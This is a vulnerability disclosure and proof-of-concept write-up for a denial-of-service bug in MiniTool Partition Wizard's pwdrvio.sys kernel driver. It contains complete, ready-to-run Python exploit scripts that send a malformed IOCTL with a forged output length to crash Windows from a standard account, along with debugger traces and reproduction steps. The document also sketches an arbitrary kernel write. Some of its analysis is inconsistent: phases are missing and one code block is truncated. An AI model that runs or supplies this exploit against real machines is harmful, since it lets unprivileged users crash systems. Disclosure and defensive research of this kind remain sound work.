Share
## https://sploitus.com/exploit?id=FF8BA0EC-E718-5A22-8B44-BFC902342407
# CVE-2026-36980-Kernel-BSOD-DoS-PoC
Project Date : Feb 2026 / Discovered a buffer overflow vulnerability in the IOCTL handler of the pwdrvio.sys kernel driver. The vulnerability allows an unprivileged local attacker to corrupt kernel pool memory, triggering an immediate system crash (BSOD) and Denial of Service.

https://github.com/user-attachments/assets/b53fb5d1-b4d0-4bc6-ad6e-2a321a1d2101

**Denial of Service (DoS)**
**Severity:** MEDIUM
**CVSS 3.1 Score:** 5.5 (DoS)  
**CVSS Vector String:** 
- DoS: `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H`

**Buffer Overflow โ€” Denial of Service (CVSS 5.5 - MEDIUM)**
   - Triggers Blue Screen of Death (BSOD)
   - Standalone exploitation (no debugger required)
   - Caused by buffer overflow via IOCTL 0x22000d
   - Consistent crash across all tested configurations

**Attack Prerequisites:**
- Local access to the target system
- Standard user account (non-administrator)
- MiniTool Partition Wizard installed or uninstalled (pwdrvio.sys driver loaded)

**Exploitation Results:** **DoS** - Immediate system crash, service unavailability

## Vulnerability Discovery Timeline

### Phase 1: Initial Fuzzing and BSOD Discovery
**Date:** February 5, 2026  
**Activity:** Systematic kernel driver fuzzing using custom Python fuzzer

**Discovery Process:**

1. **Target Selection:**
   - Enumerated installed kernel drivers on Windows 10 VM
   - Identified `pwdrvio.sys` as oldest driver (timestamp: June 16, 2009)
   - Driver file: `C:\Windows\System32\drivers\pwdrvio.sys`
   - Device object: `\\.\PartitionWizardDiskAccesser\0`

2. **Initial Fuzzing:**
   - Developed Python fuzzer using `ctypes` to interface with driver
   - Sent randomized data via `WriteFile/DeviceIoControl` to driver device
   - **Result:** Multiple Blue Screens of Death (BSOD)

3. **Verifier Activation:**
   - Enabled Driver Verifier for enhanced crash detection
   ```cmd
   verifier /standard /driver pwdrvio.sys
   ```
   
   **Verifier Configuration:**
   ```
   Verifier Flags: 0x001209bb
   Standard Flags Enabled:
     [X] Special pool
     [X] Force IRQL checking  
     [X] Pool tracking
     [X] I/O verification
     [X] Deadlock detection
     [X] DMA checking
     [X] Security checks
     [X] Miscellaneous checks
     [X] DDI compliance checking
   ```

### Phase 2: WinDbg Kernel Debugging Setup
**Date:** February 5-6, 2026  
**Activity:** Established kernel debugging environment for root cause analysis

**Setup Procedure:**

1. **VMware Serial Port Configuration:**
   ```
   VMware Workstation Pro โ†’ VM Settings
   โ”œโ”€ Add Hardware โ†’ Serial Port
   โ”œโ”€ Connection: "Use named pipe"
   โ”œโ”€ Path: \\.\pipe\com_1
   โ”œโ”€ End: "This is the server"
   โ””โ”€ I/O Mode: "Yield CPU on poll" โœ“
   ```

2. **Guest OS Configuration:**
   ```cmd
   REM Administrator Command Prompt
   bcdedit /debug on
   bcdedit /dbgsettings serial debugport:1 baudrate:115200
   shutdown /r /t 0
   ```

3. **Host WinDbg Connection:**
   ```
   WinDbg โ†’ File โ†’ Attach to Kernel
   โ”œโ”€ Port: \\.\pipe\com_1
   โ”œโ”€ Baud Rate: 115200
   โ”œโ”€ Pipe: โœ“
   โ””โ”€ Reconnect: โœ“
   
   Result: "Kernel Debugger connection established."
   ```

### Phase 3: Root Cause Analysis - Arbitrary Write Discovery
**Date:** February 6, 2026  
**Activity:** Identified arbitrary kernel write primitive

**Analysis Steps:**

1. **Module Analysis:**
   ```
   1: kd> lm m pwdrvio
   start             end                 module name
   fffff805`315f0000 fffff805`315f8000   pwdrvio  (Jun 16 2009)
   
   1: kd> !drvobj pwdrvio 2
   Driver object (fffff805`XXXXXXXX) is for:
    \Driver\pwdrvio
   
   DriverEntry:   fffff805`315f6008
   DriverUnload:  fffff805`315f1060
   
   Dispatch Routines:
   [00] IRP_MJ_CREATE                      fffff805`315f108c
   [02] IRP_MJ_CLOSE                       fffff805`315f12f8
   [03] IRP_MJ_READ                        fffff805`315f16c4
   [04] IRP_MJ_WRITE                       fffff805`315f1564  โ† Target
   [0e] IRP_MJ_DEVICE_CONTROL              fffff805`315f1404
   ```

2. **Vulnerable Instruction Discovery:**
   
   Set breakpoint on write handler:
   ```
   1: kd> bp pwdrvio+0x1641
   1: kd> g
   
   Breakpoint 0 hit
   pwdrvio+0x1641:
   fffff805`315f1641 498943f0        mov qword ptr [r11-10h],rax
   ```

   **Critical Finding:** Arbitrary write primitive identified!
   - Instruction writes kernel pointer (`RAX`) to address `[R11-0x10]`
   - `R11` is loaded from stack frame: `mov r11, qword ptr [rbp+0xB8h]`
   - No validation performed on destination address

3. **Register State Analysis:**
   ```
   0: kd> r
   rax=fffff805315f1364  โ† Kernel code pointer
   r11=ffffe60f84c38750  โ† Destination address (controlled via stack)
   rbp=ffffe60f84c38610  โ† IRP stack frame
   
   0: kd> dq @rbp+0xB8 L1
   ffffe60f`84c386c8  ffffe60f`84c38750  โ† R11 loaded from here
   ```

### Phase 4: UAF to Arbitrary Write Analysis
**Date:** February 6-7, 2026  
**Activity:** Traced vulnerability from User-After-Free to write-what-where condition

**Memory Corruption Chain:**

1. **IRP Allocation:**
   ```
   0: kd> !pool @rbp
   Pool page ffffe60f84c38610 region is Special pool
   *ffffe60f84c38000 size: 1f0 data: ffffe60f84c38e10 (NonPaged) *Irp+
   Pooltag Irp+ : I/O verifier allocated IRP packets
   ```

2. **Buffer Relationship:**
   ```
   0: kd> r rsi
   rsi=ffffe60f828df900  โ† User buffer location
   
   0: kd> ? @rbp - @rsi
   Evaluate expression: 35823344 = 00000000`02229ef0  โ† 35MB difference!
   ```

   **Analysis:** User buffer is NOT directly accessible from RBP frame
   - RBP points to IRP structure in kernel pool
   - User buffer is in different memory region
   - `RBP+0xB8` offset does not point into user-controlled buffer

3. **Use-After-Free Condition:**
   
   The driver maintains dangling pointers in the IRP structure:
   ```c
   // Ghidra decompilation (pwdrvio+0x1564)
   longlong lVar1 = *(longlong *)(param_2 + 0xb8);  // Load from IRP
   
   // No validation!
   lVar5 = IoBuildAsynchronousFsdRequest(...);
   
   // Write to [lVar1 - 0x10]
   *(code **)(lVar3 + -0x10) = FUN_00011364;  // Arbitrary write!
   ```

### Phase 6: Denial of Service Identification
**Date:** February 8, 2026  
**Activity:** Discovered standalone DoS vulnerability

**Discovery:**

1. **IOCTL Fuzzing:**
   - Tested various IOCTL codes with malformed buffers
   - Identified IOCTL `0x22000d` as vulnerable

2. **Crash Mechanism:**
   ```python
   # Vulnerable parameters
   TARGET_IOCTL = 0x22000d
   
   input_buf = (ctypes.c_char * 1024)(*([0xFF] * 1024))
   real_output_buffer = ctypes.create_string_buffer(4)
   fake_output_length = 8192  # Driver trusts this value!
   
   DeviceIoControl(handle, TARGET_IOCTL, input_buf, 1024,
                   real_output_buffer, fake_output_length, ...)
   ```

3. **Driver Behavior:**
   - Driver trusts user-supplied output buffer length
   - Attempts to write 8192 bytes into 4-byte buffer
   - Buffer overflow โ†’ Pool corruption โ†’ BSOD

**Verifier Output:**
```
DRIVER_VERIFIER_DETECTED_VIOLATION (c4)
Arg1: 0000000000000091, Corrupted pool allocation
Arg2: fffff805315f1404, Driver code address
Arg3: ffffe60f84c38000, Pool allocation address
Arg4: 0000000000000091, Corruption type

PROCESS_NAME: python.exe
```

## Vulnerability #2: Denial of Service (DoS)

### CWE Classification
- **CWE-120:** Buffer Copy without Checking Size of Input
- **CWE-119:** Improper Restriction of Operations within Memory Buffer
- **CWE-248:** Uncaught Exception

### Vulnerability Details

**Location:** `pwdrvio.sys` IOCTL handler  
**Vulnerable IOCTL:** 0x22000d  

**Trigger Mechanism:**
```python
import ctypes
from ctypes import wintypes

DEVICE_NAME = r"\\.\PartitionWizardDiskAccesser\0"
TARGET_IOCTL = 0x22000d

kernel32 = ctypes.windll.kernel32

# Open driver
handle = kernel32.CreateFileW(DEVICE_NAME, 0xC0000000, 3, None, 3, 0, None)

# Malicious parameters
input_buf = (ctypes.c_char * 1024)(*([0xFF] * 1024))
real_output_buffer = ctypes.create_string_buffer(4)  # Only 4 bytes!
fake_output_length = 8192  # Claim 8192 bytes!
bytes_returned = wintypes.DWORD(0)

# Trigger overflow
kernel32.DeviceIoControl(handle, TARGET_IOCTL, 
                         input_buf, 1024,
                         real_output_buffer, fake_output_length,  # โ† Overflow!
                         ctypes.byref(bytes_returned), None)
```

**Crash Behavior:**

With Driver Verifier enabled:
```
DRIVER_VERIFIER_DETECTED_VIOLATION (c4)
Arguments:
Arg1: 0000000000000091 - Corrupted pool allocation detected
Arg2: fffff805315f1404 - Driver code address (IOCTL handler)
Arg3: ffffe60f84c38000 - Pool allocation address
Arg4: 0000000000000091 - Special pool pattern corrupted

Analysis:
- Driver attempts to write 8192 bytes to 4-byte buffer
- Pool header corruption detected by verifier
- Immediate bugcheck (BSOD)

Process triggering crash: python.exe (standard user)
```

Without Driver Verifier:
```
SYSTEM_SERVICE_EXCEPTION (3b)
Arguments:
Arg1: 00000000c0000005 - Access violation
Arg2: fffff805315f1404 - Faulting address in pwdrvio.sys
Arg3: ffffXXXXXXXXXXXX - Trap frame
Arg4: 0000000000000000

Result: Blue Screen of Death
```

### Full Code & Exploitation

**Code:**
``` Python
import ctypes
from ctypes import wintypes

# --- Settings ---
DEVICE_NAME = r"\\.\PartitionWizardDiskAccesser\0"
kernel32 = ctypes.windll.kernel32

# --- Defines ---
# Windows API Defines
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD, 
                                 wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD, wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE

kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.LPVOID, wintypes.DWORD, 
                                     wintypes.LPVOID, wintypes.DWORD, ctypes.POINTER(wintypes.DWORD), wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL

def trigger_bsod():
    print("[!] MiniTool DoS...")
    
    # 1. Connect Driver
    handle = kernel32.CreateFileW(DEVICE_NAME, 0xC0000000, 3, None, 3, 0, None)
    
    if handle == wintypes.HANDLE(-1).value or handle is None:
        print("[-] Couldnt Connect.")
        return

    # 2. Preperation
    # IOCTL from Fuzzer
    TARGET_IOCTL = 0x22000d 
    
    # Input: Fiiled 0xFF - 1024 byte (Pointer Poisoning)
    in_size = 1024
    input_buf = (ctypes.c_char * in_size)(*([0xFF] * in_size))
    
    # Output Trap: Standard 4 byte, 8192 byte in Driver
    real_output_buffer = ctypes.create_string_buffer(4)
    fake_output_length = 8192 
    bytes_returned = wintypes.DWORD(0)

    print("[+] Wait for BSoD...")

    # 3. Loop (Pool Corruption)
    while True:
        kernel32.DeviceIoControl(
            handle, 
            TARGET_IOCTL, 
            input_buf, 
            in_size, 
            real_output_buffer, 
            fake_output_length, #  & "C:\Program Files\Python314\python.exe" .\DoS_PoC.py
```

## Proof of Concept & Reproduction Steps

### Prerequisites

**Test Environment:**
- **Operating System:** Windows 10 Home Build 19045.6466
- **Architecture:** x64
- **MiniTool Version:** Partition Wizard 13.5
- **Driver:** pwdrvio.sys (dated June 16, 2009)
- **User Account:** Standard user (non-administrator)

**Required Tools:**
- **For LPE:** WinDbg (Windows Debugger), VMware Workstation
- **For DoS:** Python 3.x with ctypes

### Reproduction #1: Denial of Service (Standalone)

**Step 1: Verify Driver Installation**

```cmd
C:\> sc query pwdrvio

SERVICE_NAME: pwdrvio
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 4  RUNNING
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
```

**Step 2: Enable Driver Verifier (Optional but Recommended)**

```cmd
REM Administrator Command Prompt
C:\> verifier /standard /driver pwdrvio.sys

REM Verify configuration
C:\> verifier /query

Verifier Flags: 0x001209bb
  Standard Flags:
    [X] 0x00000001 Special pool
    [X] 0x00000002 Force IRQL checking
    [X] 0x00000008 Pool tracking
    [X] 0x00000010 I/O verification
    [X] 0x00000020 Deadlock detection
    [X] 0x00000080 DMA checking
    [X] 0x00000100 Security checks
    [X] 0x00000800 Miscellaneous checks
    [X] 0x00020000 DDI compliance checking

  Driver Verification List:
    MODULE: pwdrvio.sys (load: 1 / unload: 0)

REM Reboot for verifier to take effect
C:\> shutdown /r /t 0
```

**Step 3: Create DoS Exploit Script**

Save as `dos_exploit.py`:

```python
import ctypes
from ctypes import wintypes

# Device path
DEVICE_NAME = r"\\.\PartitionWizardDiskAccesser\0"
kernel32 = ctypes.windll.kernel32

# Windows API definitions
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD, 
                                 wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD, 
                                 wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE

kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.LPVOID, 
                                     wintypes.DWORD, wintypes.LPVOID, wintypes.DWORD, 
                                     ctypes.POINTER(wintypes.DWORD), wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL

def trigger_bsod():
    print("[*] MiniTool pwdrvio.sys DoS Exploit")
    print("[*] Triggering Blue Screen of Death...")
    
    # Open device
    handle = kernel32.CreateFileW(DEVICE_NAME, 0xC0000000, 3, None, 3, 0, None)
    
    if handle == wintypes.HANDLE(-1).value or handle is None:
        print("[-] Failed to open driver")
        print("[-] Ensure MiniTool Partition Wizard is installed")
        return
    
    print("[+] Driver opened successfully")
    
    # Vulnerable IOCTL code
    TARGET_IOCTL = 0x22000d
    
    # Input buffer: 1024 bytes of 0xFF
    input_buf = (ctypes.c_char * 1024)(*([0xFF] * 1024))
    
    # Output buffer: Only 4 bytes (but claim 8192!)
    real_output_buffer = ctypes.create_string_buffer(4)
    fake_output_length = 8192  # Driver trusts this value โ†’ Overflow!
    bytes_returned = wintypes.DWORD(0)
    
    print("[!] Sending malicious IOCTL...")
    print("[!] System will crash in 3...2...1...")
    
    # Trigger buffer overflow โ†’ BSOD
    kernel32.DeviceIoControl(
        handle, 
        TARGET_IOCTL, 
        input_buf, 
        1024, 
        real_output_buffer, 
        fake_output_length,  # โ† Vulnerability trigger
        ctypes.byref(bytes_returned), 
        None
    )
    
    # This line will never execute
    print("[*] If you see this, the exploit failed")

if __name__ == "__main__":
    trigger_bsod()
```

**Step 4: Execute Exploit (Standard User)**

```cmd
C:\> whoami
desktop-lfkkhu2\standard_user

C:\> python dos_exploit.py
[*] MiniTool pwdrvio.sys DoS Exploit
[*] Triggering Blue Screen of Death...
[+] Driver opened successfully
[!] Sending malicious IOCTL...
[!] System will crash in 3...2...1...

[System immediately crashes with BSOD]
```

**Expected Result:** 

Blue Screen with stop code:
```
DRIVER_VERIFIER_DETECTED_VIOLATION (c4)
```
or
```
SYSTEM_SERVICE_EXCEPTION (3b)
```

**Verification:** System crash confirms DoS vulnerability

**MiniTool Software:**
```
Product:               MiniTool Partition Wizard
Version:               13.5
Installation Path:     C:\Program Files\MiniTool Partition Wizard
Driver Path:           C:\Windows\System32\drivers\pwdrvio.sys
Driver Date:           June 16, 2009 (0x4A36F8D1)
Driver Size:           32,256 bytes
```

**Testing Tools:**
```
WinDbg Version:        10.0.29507.1001 AMD64
Python Version:        3.x with ctypes
Compiler:              x86_64-w64-mingw32-gcc (MinGW)
Verifier:              Windows Driver Verifier (Standard flags)
```

## Affected Versions

### Confirmed Vulnerable

**Primary Product:**
- MiniTool Partition Wizard 13.5
- All previous versions using pwdrvio.sys

**Driver Details:**
```
File Name:          pwdrvio.sys
File Version:       [Not available]
File Size:          32,256 bytes (31.5 KB)
Time Stamp:         0x4A36F8D1 (June 16, 2009, 04:43:45 UTC)
Digital Signature:  [Signed by vendor]
Device Name:        \\.\PartitionWizardDiskAccesser\0
Service Name:       pwdrvio
Load Order:         Boot Start (SERVICE_BOOT_START)
```

### Potentially Affected

Other MiniTool products that may use the same driver:
- MiniTool Power Data Recovery
- MiniTool Partition Wizard Bootable Edition
- MiniTool ShadowMaker

**Note:** Each product should be tested individually for confirmation.

### Operating System Compatibility

**Tested and Confirmed Vulnerable:**
- Windows 10 Home Build 19045.6466 (x64)

**Likely Vulnerable (untested):**
- Windows 7 (x64)
- Windows 8 / 8.1 (x64)
- Windows 10 (all builds, x64)
- Windows 11 (x64)
- Windows Server 2008 R2 and later

**Reason:** Driver is compatible with all modern Windows versions and contains no version-specific checks.

## Legal Disclaimer

This vulnerability disclosure report is provided for:
1. Security research and education
2. Vendor notification and patch development
3. Protection of end users
4. Academic and defensive security purposes

**Prohibited Uses:**
- Unauthorized access to computer systems
- Malicious exploitation
- Any illegal activity

The researcher conducted all testing on personally owned systems in controlled environments. No unauthorized access to third-party systems was performed.

**Report Version:** 1.0  
**Last Updated:** February 9, 2026